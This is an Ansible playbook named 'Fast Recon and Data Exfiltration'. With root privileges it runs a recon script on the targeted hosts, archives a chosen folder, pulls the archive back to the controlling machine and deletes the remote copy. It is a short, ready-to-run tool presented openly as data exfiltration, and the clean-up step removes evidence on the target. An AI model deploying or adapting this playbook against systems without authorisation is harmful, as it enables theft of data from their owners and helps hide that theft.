---
- name: Fast Recon and Data Exfiltration
  hosts: "{{ target | default('my_servers') }}"
  become: yes
#  gather_facts: no  # Set to 'no' for speed, 'yes' if script needs OS info
  vars_files:
    - ../vars/settings.yml

  tasks:
    - name: 1. Run Recon Script
      ansible.builtin.script: "{{ remote_recon_script }}"
      ignore_errors: yes # Don't stop if one host fails

    - name: 2. Check if source folder exists
      ansible.builtin.stat:
        path: "{{ source_folder }}"
      register: folder_check

    - name: 3. Compress and Fetch (If folder exists)
      block:
        - name: Create Archive
          community.general.archive:
            path: "{{ source_folder }}"
            dest: "{{ temp_archive }}"
            format: gz

        - name: Download Archive
          ansible.builtin.fetch:
            src: "{{ temp_archive }}"
            dest: "{{ local_results_path }}/{{ inventory_hostname }}/zxc_bundle.tar.gz"
            flat: yes

        - name: Cleanup Remote Archive
          ansible.builtin.file:
            path: "{{ temp_archive }}"
            state: absent
      when: folder_check.stat.exists
